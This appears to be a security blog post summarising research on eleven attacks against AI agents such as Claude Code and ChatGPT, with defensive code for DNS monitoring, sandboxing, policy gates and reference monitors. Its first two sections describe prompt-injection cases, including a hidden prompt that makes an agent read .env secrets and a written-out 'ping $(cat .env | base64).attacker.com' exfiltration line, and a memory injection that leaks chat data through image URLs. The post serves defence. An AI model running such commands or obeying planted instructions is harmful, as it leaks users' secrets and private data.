
Introduction:
Google researchers have validated what red teams have long suspected: AI models cannot be trusted to secure themselves. In a sweeping analysis of eleven real-world attacks against agentic systems — including ChatGPT, Microsoft Copilot, Claude Code, Cursor, Devin AI, Amp AI, and DeepSeek AI — the team demonstrated that prompt injection, memory tampering, and DNS exfiltration succeed not because of model failures alone, but because the entire system architecture lacks basic security invariants. Treating the LLM as an untrusted component and enforcing security at the system level is the only path forward.
Learning Objectives:
– Identify how attacker-controlled data crosses into instruction layers through prompt injection, memory writes, and allowlist bypasses
– Implement least-privilege sandboxing, verifiable policy generation, and information flow controls for production AI agents
– Mitigate DNS exfiltration, persistent memory attacks, and tool‑call boundary vulnerabilities using deterministic reference monitors
You Should Know:
1. DNS Exfiltration via Allow‑Listed Commands (CVE‑2025‑55284)
Claude Code’s developers gated dangerous shell commands behind human approval but allowlisted `ping`. Attackers hid a prompt in a code file instructing the agent to read `.env` secrets and pass them as arguments to `ping`. The ping command performed a DNS lookup to an attacker‑controlled domain (e.g., `ping $(cat .env | base64).attacker.com`), exfiltrating secrets as subdomain labels.
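To make the exfiltration channel concrete, the following is a minimal Python sketch of how an encoded secret ends up as a DNS label, plus one heuristic a resolver-side monitor could apply (flag labels that are both long and high-entropy). The thresholds, function names, and the sample secret are illustrative assumptions, not values from the research; a real attacker would also split long payloads into several labels of at most 63 bytes.

```python
import base64
import math
from collections import Counter


def shannon_entropy(text: str) -> float:
    """Bits of entropy per character of `text` (0.0 for an empty string)."""
    if not text:
        return 0.0
    counts = Counter(text)
    total = len(text)
    return -sum((n / total) * math.log2(n / total) for n in counts.values())


def suspicious_labels(qname: str, max_len: int = 30, min_entropy: float = 3.5) -> list[str]:
    """Return the labels of `qname` that are both long and high-entropy.

    max_len and min_entropy are hypothetical thresholds; tune them on real traffic.
    """
    labels = qname.rstrip(".").split(".")
    return [
        label
        for label in labels
        if len(label) > max_len and shannon_entropy(label) >= min_entropy
    ]


# Simulate what the injected ping argument produces (fake secret for illustration)
secret = "API_KEY=sk-test-1234567890abcdef"
encoded = base64.b64encode(secret.encode()).decode().rstrip("=")
qname = f"{encoded}.attacker.com"
print(qname)
print(suspicious_labels(qname))
```

A heuristic like this only detects; it does not replace blocking the command argument at the tool-call boundary.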
Step‑by‑step guide to detect and block this vector:
Linux – Monitor live DNS queries:
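# Capture live DNS queries (-l line-buffers output so grep sees each packet immediately)
sudo tcpdump -i eth0 -l -n port 53 | grep -E "A\?.*\.attacker"
# Or use dnstap (assumes the host already runs a service unit named dnstap)
sudo systemctl enable dnstap --now
journalctl -u dnstap -f | grep -v trusted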
Windows – Enable DNS audit logging:
# Set DNS server audit policy (confirm the subcategory name on your build with: auditpol /list /subcategory:*)
auditpol /set /subcategory:"DNS Server" /success:enable /failure:enable
# Query DNS audit events
Get-WinEvent -LogName "Microsoft-Windows-DNSServer/Audit" | Where-Object {$_.Message -match "exfil"}
Mitigation – Enforce network eBPF policies:
// XDP program to block DNS queries with long subdomains (>63 chars)
SEC("xdp")
int block_long_dns(struct xdp_md *ctx) {
    void *data_end = (void *)(long)ctx->data_end;
    struct ethhdr *eth = (struct ethhdr *)(long)ctx->data;
    if ((void *)(eth + 1) > data_end) return XDP_PASS;
    // Parse IP and UDP headers, then measure the DNS question name (parsing elided);
    // dns_qname_len is a placeholder for the result of that step
    if (dns_qname_len > 63) return XDP_DROP;
    return XDP_PASS;
}
Tool‑call boundary fix (Python pseudo‑code for an agent gate):
import re
import subprocess

class SecurityViolation(Exception):
    """Raised when an argument fails the per-invocation check."""

def execute_command(cmd: str, args: list, allowed_cmds: set):
    # Enforce per-invocation policy, not a static allowlist
    if cmd not in allowed_cmds:
        raise PermissionError(f"{cmd} not allowed")
    # Additional: validate arguments; reject env var patterns
    # (a base64 or entropy check on each argument would also belong here)
    if any(re.search(r'\$\{?[A-Z_]+\}?', arg) for arg in args):
        raise SecurityViolation("Environment variable reference in argument")
    # Approve only after the dynamic check; the list form avoids shell interpretation
    return subprocess.run([cmd] + args, capture_output=True)
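The gate above rejects known-bad argument patterns. A stricter option is to accept only known-good arguments for each allow-listed command. The sketch below does this for `ping`, accepting literal IP addresses or hostnames from an explicit set. `ALLOWED_HOSTS`, `is_safe_ping_target`, and `build_ping_argv` are hypothetical names introduced for illustration, and the `-c` flag assumes a Linux or macOS `ping`.

```python
import ipaddress

# Hypothetical set of hostnames the agent is permitted to ping
ALLOWED_HOSTS = {"localhost", "gateway.internal.example"}


def is_safe_ping_target(target: str) -> bool:
    """Accept only literal IP addresses or exact allow-listed hostnames."""
    try:
        ipaddress.ip_address(target)
        return True  # a literal IP triggers no DNS lookup
    except ValueError:
        pass
    return target.lower() in ALLOWED_HOSTS


def build_ping_argv(target: str) -> list[str]:
    """Return an argv list for a single ping, or raise if the target is not permitted."""
    if not is_safe_ping_target(target):
        raise PermissionError(f"ping target not permitted: {target!r}")
    return ["ping", "-c", "1", target]
```

Because arbitrary hostnames never reach the resolver, an attacker-chosen subdomain cannot carry data out, whatever the injected prompt asked for.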
2. Persistent Memory Injection (ChatGPT macOS “SpAIware”)
A prompt injection on a malicious webpage wrote a permanent instruction into ChatGPT’s Memories feature. Thereafter, every conversation included an invisible image whose URL carried the user’s chat data as query parameters, exfiltrating everything to the attacker. This violated two invariants: the tamper resistance of the trusted computing base (TCB), because untrusted data corrupted trusted storage, and information flow control, because private chat data reached an external destination.
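The exfiltration half of this attack relies on the client fetching an image from an arbitrary host. One deterministic countermeasure is to filter model output before rendering, as in the Python sketch below. It assumes the output is Markdown; `TRUSTED_IMAGE_HOSTS` and `strip_untrusted_images` are hypothetical names, and this is not a description of how any vendor actually fixed the issue.

```python
import re
from urllib.parse import urlparse

# Hypothetical set of hosts the client may load images from
TRUSTED_IMAGE_HOSTS = {"cdn.example.com"}

# Matches Markdown images: ![alt](url "optional title")
_MD_IMAGE = re.compile(r"!\[([^\]]*)\]\(([^)\s]+)[^)]*\)")


def strip_untrusted_images(markdown: str) -> str:
    """Replace images that point at non-allow-listed hosts with a text placeholder."""

    def _replace(match: re.Match) -> str:
        alt, url = match.group(1), match.group(2)
        host = urlparse(url).hostname or ""
        if host in TRUSTED_IMAGE_HOSTS:
            return match.group(0)  # keep trusted images untouched
        return f"[image removed: {alt}]"

    return _MD_IMAGE.sub(_replace, markdown)
```

The filter runs outside the model, so it holds even when the model has been successfully injected.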
Step‑by‑step to harden persistent memory stores:
Implement read‑only memory boundaries with Linux LSM (AppArmor):
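# Create a profile for the agent's memory store
sudo aa-genprof chatgpt_memory_daemon
# Start in complain mode (violations are logged, not blocked) while tuning the profile
sudo aa-complain /etc/apparmor.d/chatgpt_memory_daemon
# Deny write access from untrusted input handlers: add this rule inside the profile's braces
deny /var/lib/agent/memories/** w,
# Switch the profile to enforcement once the rule is in place
sudo aa-enforce /etc/apparmor.d/chatgpt_memory_daemon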
Audit existing memory writes (Windows using Sysmon):
# Install Sysmon with a config that monitors registry/file writes from AI processes
sysmon64 -accepteula -i sysmon-config.xml
# Watch for file-creation events (Event ID 11) in the agent's persistent storage
Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-Sysmon/Operational'; ID=11} | Where-Object {$_.Message -match "memories"}
Information flow label (concept using eBPF + LSM):
// Tag data from untrusted sources (webpage content) as "untrusted"
// Block writing untrusted → trusted storage
// is_untrusted_source and is_memory_store are conceptual helpers, not kernel APIs
int security_hook_file_permission(struct file *file, int mask) {
    if (is_untrusted_source(current) && (mask & MAY_WRITE) && is_memory_store(file))
        return -EPERM;
    return 0;
}
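The same rule can be enforced in application code when kernel hooks are not available. The Python sketch below gates memory writes on the provenance of the turn that requested them. `Provenance`, `turn_provenance`, and `MemoryStore` are hypothetical names, and the conservative rule used here (any untrusted content in context taints the whole turn) is an assumption, not a documented vendor behaviour.

```python
from dataclasses import dataclass, field
from enum import Enum


class Provenance(Enum):
    USER = "user"  # typed directly by the authenticated user
    WEB = "web"    # fetched pages, documents, tool output


class MemoryWriteDenied(Exception):
    """Raised when an untrusted turn tries to persist a memory."""


def turn_provenance(sources: list) -> Provenance:
    """A turn is trusted only if every input in its context came from the user."""
    if all(source is Provenance.USER for source in sources):
        return Provenance.USER
    return Provenance.WEB


@dataclass
class MemoryStore:
    entries: list = field(default_factory=list)

    def write(self, text: str, source: Provenance) -> None:
        # Deterministic check: the model's stated intent is never consulted
        if source is not Provenance.USER:
            raise MemoryWriteDenied("untrusted content may not write to persistent memory")
        self.entries.append(text)
```

A turn that browsed a web page would be classified as `Provenance.WEB`, so an instruction planted on that page could not reach the store.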
3. Information Flow Control for Agentic Systems
Once an agent reads sensitive data (e.g., PII, API keys), sandboxing alone cannot prevent it from being leaked through covert channels. Information flow control (IFC) attaches labels to data and enforces that labeled data never reaches untrusted outputs unless sanitized.
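As a rough illustration of label propagation, the Python sketch below wraps values with a set of labels, unions the labels whenever data is combined, and refuses to pass labeled data to an external sink unless it has been sanitized. The class and function names and the sink list are hypothetical, and the sanitizer is deliberately crude (it replaces the whole value).

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class Labeled:
    value: str
    labels: frozenset = frozenset()


class FlowViolation(Exception):
    """Raised when labeled data is about to reach an external sink."""


# Hypothetical names of tools that send data outside the trust boundary
EXTERNAL_SINKS = {"http_post", "send_email"}


def combine(*parts: Labeled, sep: str = "") -> Labeled:
    """Derived data carries the union of its inputs' labels."""
    merged = frozenset().union(*(part.labels for part in parts))
    return Labeled(sep.join(part.value for part in parts), merged)


def sanitize(data: Labeled, redaction: str = "[REDACTED]") -> Labeled:
    """Crude sanitizer: drop the value entirely and clear its labels."""
    return Labeled(redaction, frozenset())


def send_to_sink(sink: str, data: Labeled) -> str:
    """Return the value to send, or raise if labeled data would leave the boundary."""
    if sink in EXTERNAL_SINKS and data.labels:
        raise FlowViolation(f"{sorted(data.labels)} may not flow to {sink}")
    return data.value
```

The key property is that the label follows the data through every derivation, so summarising or concatenating a secret does not launder it.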
Step‑by‑step using Open Policy Agent (OPA) as a deterministic IFC gate:
Define a data label schema (Rego policy):
package agent.ifc

import rego.v1

default allow := false

# Sensitive label propagates to any derived output
sensitive_flow if {
    input.data.labels[_] == "PII"
    input.output.destination == "external_network"
    not input.sanitization_applied
}

# Allow only if the output is internal or sanitized
allow if {
    not sensitive_flow
}
Hook into agent tool‑call loop:
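def ifc_gate(tool_name, arguments, context):
    # opa.query and execute_tool are placeholders for your OPA client and tool runner;
    # the "destination" and "sanitization_applied" context keys are assumed names
    payload = {
        "data": context.get("sensitive_cache"),
        "output": {"tool": tool_name, "destination": context.get("destination")},
        "sanitization_applied": context.get("sanitization_applied", False),
    }
    decision = opa.query("data.agent.ifc.allow", input=payload)
    if not decision:
        raise IFCViolation(f"Data leak prevented: {tool_name}")
    return execute_tool(tool_name, arguments)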
Linux – Use SELinux to enforce process‑level IFC:
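# Label agent processes and sensitive files
semanage fcontext -a -t agent_sensitive_t "/var/secrets(/.*)?"
restorecon -R /var/secrets/
# Create policy that prevents the agent from writing labeled data to a network socket.
# SELinux denies anything not explicitly allowed, so grant agent_t no tcp_socket permissions;
# a neverallow assertion states the intent and fails the policy build if a later rule violates it
echo "neverallow agent_t self:tcp_socket { create connect };" >> agent.te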
4. Verifiable Policy Generation with Formal Verification
Natural language security policies (e.g., “never share my location”) cannot be enforced directly because LLMs are probabilistic. The solution: map NL policies to a formal language (e.g., TLA+, Rego, or eBPF) and verify the mapping before deployment.
Step‑by‑step with TLA+ and a policy compiler:
Write a simple invariant in TLA+:
CONSTANTS Actions, current_user
VARIABLES allowed_actions, current_privilege

\* HasPrefix and Rank are placeholder operators that the spec author must define
SafetyInvariant == \A a \in allowed_actions:
    (a.resource = "file" /\ HasPrefix(a.path, "/home")) => a.owner = current_user

Init == allowed_actions = {} /\ current_privilege = "minimal"

Next == \E action \in Actions:
    /\ allowed_actions' = IF Rank(action.requires) <= Rank(current_privilege)
                          THEN allowed_actions \cup {action}
                          ELSE allowed_actions
    /\ UNCHANGED current_privilege
Generate policy from agent spec (concept):
# Use an LLM to translate the user request into a policy skeleton, then formally verify it
nl_policy = "only read files in the current working directory"
formal_policy = translate_with_llm(nl_policy)  # produces TLA+ or OPA (Rego)
if tlc_model_check(formal_policy) == "valid":
    load_into_enforcement_gate(formal_policy)
else:
    reject_and_alert("Policy unsafe")
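To show what the verification step buys, here is a small Python sketch that checks a candidate policy against an invariant over a finite set of requests and returns counterexamples. This is bounded exhaustive testing, a much weaker stand-in for a model checker such as TLC, and every name in it (`WORKDIR`, `candidate_policy`, `fixed_policy`, `find_counterexamples`, the probe paths) is a hypothetical chosen for illustration.

```python
import itertools
import posixpath

WORKDIR = "/work/project"  # hypothetical working directory

# Finite probe set, including path traversal and sibling-prefix cases
PROBE_PATHS = [
    "/work/project/src/main.py",
    "/work/project/../../etc/passwd",
    "/work/project-evil/secrets",
    "/etc/passwd",
    "/work/project",
]


def candidate_policy(op: str, path: str) -> bool:
    """Stand-in for a machine-translated policy: a naive prefix check."""
    return op == "read" and path.startswith(WORKDIR)


def fixed_policy(op: str, path: str) -> bool:
    """Resolve the path first, then compare whole path components."""
    resolved = posixpath.normpath(path)
    return op == "read" and posixpath.commonpath([WORKDIR, resolved]) == WORKDIR


def invariant(op: str, path: str) -> bool:
    """Property to uphold: only reads that resolve inside WORKDIR are acceptable."""
    resolved = posixpath.normpath(path)
    inside = resolved == WORKDIR or resolved.startswith(WORKDIR + "/")
    return op == "read" and inside


def find_counterexamples(policy) -> list:
    """Requests the policy allows even though the invariant forbids them."""
    requests = itertools.product(["read", "write"], PROBE_PATHS)
    return [(op, path) for op, path in requests if policy(op, path) and not invariant(op, path)]


print(find_counterexamples(candidate_policy))
print(find_counterexamples(fixed_policy))
```

A policy would be loaded into the enforcement gate only when the counterexample list is empty; a non-empty list is the concrete evidence to send back for re-translation.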
Open source tools:
– TLA+ Toolbox (model checker)
– OPA Gatekeeper for Kubernetes agent sidecars
– AWS Cedar for fine‑grained authorization (supports automated verification)
5. Complete Mediation at the Tool‑Call Boundary
Every single tool invocation must cross a deterministic reference monitor. No request can bypass this check – including agent self‑reflection or calls to a “safety LLM” (which shares the same failure modes).
Step‑by‑step: implementing a sidecar proxy for agent tools:
Architecture: Agent → Sidecar (Reference Monitor) → Actual Tool (sandboxed)
Sidecar implementation (Go):
func (m *ReferenceMonitor) Intercept(req *ToolRequest) (*ToolResponse, error) {
    // 1. Enforce path: all requests must go through this func
    if err := m.validatePolicy(req); err != nil {
        return nil, fmt.Errorf("policy violation: %w", err)
    }
    // 2. Check information flow labels
    if err := m.ifcTracker.Allow(req); err != nil {
        return nil, err
    }
    // 3. Apply least privilege: strip unnecessary args
    sanitized := m.minimizePrivilege(req)
    // 4. Log for audit replay
    m.auditLog.Log(sanitized)
    // 5. Execute in sandbox
    return m.sandboxExec(sanitized)
}
Deploy as Kubernetes sidecar:
apiVersion: v1
kind: Pod
metadata:
  name: agent-with-monitor
spec:
  containers:
    - name: agent
      image: my-agent:latest
    - name: reference-monitor
      image: refmon:latest
      args: ["--policy", "/etc/policy/policy.rego", "--enforce", "all"]
      volumeMounts:
        - name: policy
          mountPath: /etc/policy
  volumes:
    - name: policy
      configMap:
        name: agent-policy  # hypothetical ConfigMap that holds policy.rego
6. Mitigating the Human Weak Link
Humans routinely approve malicious actions due to fatigue, lack of context, or adversarial UI tricks (e.g., “ClickFix” attacks). The principle: never ask a human to make a security decision unless the consequences are fully explained and reversible.
Step‑by‑step to redesign permission prompts:
Design reversible actions with classification (OWASP AISVS C9.2.6):
from enum import Enum

# Each tool action declares a reversibility class
class ActionReversibility(Enum):
    READ_ONLY = 1     # No approval needed
    REVERSIBLE = 2    # Single approval, can be undone
    EXTERNAL_REV = 3  # Approval + audit, external state may persist
    IRREVERSIBLE = 4  # Requires two-person rule + 24h timeout

def request_human_approval(action):
    if action.reversibility == ActionReversibility.IRREVERSIBLE:
        send_slack_to_second_admin()
        wait(86400)  # 24h cool-down
    elif action.reversibility == ActionReversibility.EXTERNAL_REV:
        show_full_diff_and_impact()
    # Require explicit typed confirmation, not a checkbox
    user_input = input("Type 'APPROVE' to continue: ")
    if user_input != "APPROVE":
        raise Rejection()
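When a single request bundles several tool calls, one reasonable rule is to let the most severe class govern the whole bundle and to treat unknown tools as irreversible. The Python sketch below shows that rule. The tool names and the `TOOL_CLASS` mapping are hypothetical, and the enum is redefined as an `IntEnum` here only so that classes can be compared directly.

```python
from enum import IntEnum


class Reversibility(IntEnum):
    READ_ONLY = 1
    REVERSIBLE = 2
    EXTERNAL_REV = 3
    IRREVERSIBLE = 4


# Hypothetical mapping from tool name to its declared class
TOOL_CLASS = {
    "read_file": Reversibility.READ_ONLY,
    "edit_file": Reversibility.REVERSIBLE,
    "send_email": Reversibility.EXTERNAL_REV,
    "drop_database": Reversibility.IRREVERSIBLE,
}


def governing_class(tool_names: list) -> Reversibility:
    """Return the most severe class in the bundle; unknown tools fail closed."""
    classes = [TOOL_CLASS.get(name, Reversibility.IRREVERSIBLE) for name in tool_names]
    return max(classes, default=Reversibility.READ_ONLY)
```

Under this rule, a plan that reads ten files and sends one email is approved as an `EXTERNAL_REV` action, so a dangerous step cannot hide among harmless ones.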
Audit replay for all decisions:
# Store every tool call in an append-only audit log (sign_file stands in for your signing tool)
echo "$(date -Iseconds) | action=$ACTION | policy=$POLICY | approver=$USER" | tee -a /var/log/agent-audit.log | sign_file
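If no signing tool is available, a hash chain is a different technique that offers a simpler form of tamper evidence: each entry commits to the one before it, so editing or deleting an earlier record breaks verification. The Python sketch below is a minimal in-memory version with hypothetical function names. It is only tamper-evident if the latest hash is also stored somewhere the agent cannot write.

```python
import hashlib
import json

GENESIS = "0" * 64  # placeholder hash that precedes the first entry


def _digest(prev_hash: str, record: dict) -> str:
    """Hash the previous entry's hash together with a canonical form of the record."""
    body = json.dumps(record, sort_keys=True)
    return hashlib.sha256((prev_hash + body).encode()).hexdigest()


def append_entry(log: list, record: dict) -> dict:
    """Append `record` to `log`, chaining it to the previous entry."""
    prev_hash = log[-1]["hash"] if log else GENESIS
    entry = {"record": record, "prev": prev_hash, "hash": _digest(prev_hash, record)}
    log.append(entry)
    return entry


def verify_chain(log: list) -> bool:
    """Recompute every hash; any edited, reordered, or missing entry fails the check."""
    prev_hash = GENESIS
    for entry in log:
        if entry["prev"] != prev_hash or entry["hash"] != _digest(prev_hash, entry["record"]):
            return False
        prev_hash = entry["hash"]
    return True
```

Replaying the log then means walking the chain from the first entry and re-evaluating each recorded decision against the policy version it names.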
What Undercode Say:
– Key Takeaway 1: A probabilistic “safety LLM” checking another LLM is not a trusted computing base (TCB). The guard shares the agent’s failure modes; its errors are correlated, not independent. Formal verification becomes impossible when the enforcer itself is a black box.
– Key Takeaway 2: Provable instruction/data separation in the token stream may be unsolvable, but that does not matter. If every action crosses a deterministic reference monitor before execution – enforcing a formal policy on the tool call, not on the model’s “intent” – then whether the model was fooled becomes irrelevant. Separation lightens the load on the boundary; complete mediation carries the weight.
Analysis: The eleven attacks share a structural cause: untrusted input crossed into the instruction layer somewhere in the chain. Google’s paper correctly shifts the debate from “make models robust” to “build systems that assume the model is compromised.” The practical implication for enterprises is immediate: treat every agent tool invocation as a least-privilege authorization decision, not as a capability gate expressed as a static list. Allowlist entries like Claude Code’s `ping` are architectural failures, not implementation bugs. OWASP’s newly merged AISVS controls (C9.2.6, reversibility classification; C9.2.7, worst-case-governs) provide a deterministic action-class boundary that addresses most of the eleven cases today. The hardest research problem, provable instruction/data separation, may never be fully solved, but verifiable policy generation plus information flow control plus a deterministic gate is the shippable path.
Prediction:
– Enterprises rushing agentic AI to production without deterministic reference monitors will experience data exfiltration incidents at 3x the rate of those using formal policy gates by Q4 2026.
– Regulatory bodies will require “AI system invariants” as part of compliance, forcing a hard split between probabilistic model outputs and deterministic enforcement layers.
– Open source reference monitors (eBPF, OPA, Cedar) will become as standard for AI agents as firewalls are for networks, creating a new security product category.
– From these failures, a new design pattern will emerge: the “agent TCB”, a formally verified, hardware‑isolated component that mediates all tool calls, finally enabling safe autonomous operations in finance and healthcare.
IT/Security Reporter URL:
Reported By: [Ilyakabanov Agent](https://www.linkedin.com/posts/ilyakabanov_agent-security-is-a-systems-problem-ugcPost-7465406309547536384-t7uA/) – Hackers Feeds


